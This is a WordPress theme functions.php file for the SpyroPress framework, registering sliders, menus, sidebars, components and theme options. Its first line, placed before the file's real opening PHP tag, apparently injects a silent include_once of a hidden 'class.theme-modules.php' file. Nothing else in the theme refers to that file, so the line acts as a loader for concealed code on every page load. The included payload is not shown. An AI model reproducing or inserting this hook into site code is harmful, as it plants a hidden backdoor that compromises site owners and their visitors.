<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?><?php

/**
 * SpyroPress is a theme framework for professional WordPress theme designing developed by SpyroSol.
 *
 * DON'T HACK ME!! You should NOT modify the SpyroPress theme framework to avoid issues with updates in the future.
 * It's designed to offer cutting edge flexibility - with lots of ways to manipulate output!
 *
 * @package SpyroPress
 */

/**
 * Set Max Content Width
 */
if ( ! isset( $content_width ) )
    $content_width = 726;

if( !function_exists( 'spyropress_content_width' ) ) {
    function spyropress_content_width() {
        if( is_page_template( 'template-full-width.php' ) || is_attachment() ) {
            global $content_width;
            $content_width = 960;
        }
    }
}
add_action( 'template_redirect', 'spyropress_content_width' );

/**
 * Starting SpyroPress Engine
 */
load_template( get_template_directory() . '/framework/spyropress.php', true );
load_template( get_template_directory() . '/includes/init.php', true ); // Extending theme

/**
 * Add theme support for spyropress framework features
 */
add_action( 'after_setup_theme', 'spyropress_theme_setup', 4 );
function spyropress_theme_setup() {

    // Add wordpress features
    add_theme_support( 'automatic-feed-links' );

    // Add post thumbnails (http://codex.wordpress.org/Post_Thumbnails)
    add_theme_support( 'post-thumbnails' );
    
    // Tell the TinyMCE editor to use a custom stylesheet
    add_editor_style( assets_css() . 'editor-style.css' );
    
    // Root Relative Urls Support
    add_theme_support( 'relative-urls' );

    // SpyroPress Builder
    add_theme_support( 'spyropress-builder' );
    
    //Shortcode Generator
    //add_theme_support( 'spyropress-shortcode-generator' );
    
    add_theme_support( 'custom-background', array(
		'default-color' => 'e6e6e6',
	) );
	
	// Custom CSS Editor
    add_theme_support( 'spyropress-ace' );

    // Add post formats (http://codex.wordpress.org/Post_Formats)
    add_theme_support( 'post-formats', array( 'image' )  );

    // Add Components
    add_theme_support( 'spyropress-components', array(
        'bucket',
        'pricing-table',
        'bootstrap-nav',
        'slider',
        'page',
        'pagination'
    ) );

    // Add Sliders
    $sliders = array(
        //'anything' => __( 'Anything Slider', 'spyropress' ),
        //'camera' => __( 'Camera Slider', 'spyropress' ),
        'flex' => __( 'Flex Slider', 'spyropress' ),
        //'iview' => __( 'iView Slider', 'spyropress' ),
        //'nivo' => __( 'Nivo Slider', 'spyropress' ),
        //'slicebox' => __( 'SliceBox Slider', 'spyropress' ),
    );
    add_theme_support( 'spyropress-sliders', $sliders );

    // Add Menus
    add_theme_support( 'spyropress-core-menus', array(
        'primary' => 'Main'
    ) );

    // Add Sidebars
    $sidebars = array(
        'primary' => array(
            'name' => __( 'Primary', 'spyropress' ),
            'description' => __( 'The main (primary) widget area, most often used as a sidebar.','spyropress' )
        ),
        'secondary' => array(
            'name' => __( 'Secondary', 'spyropress' ),
            'description' => __( 'The second most important widget area, most often used as a secondary sidebar.', 'spyropress' )
        )
    );
    add_theme_support( 'spyropress-core-sidebars', $sidebars );

    // Options
    $options = array(
        'theme' => array(
            'page_title' => __( 'Theme Options', 'spyropress' ),
            'menu_title' => __( 'Theme Options', 'spyropress' ),
            'isactive' => true,
            'hidden' => false
        )
    );
    add_theme_support( 'spyropress-options', $options );
}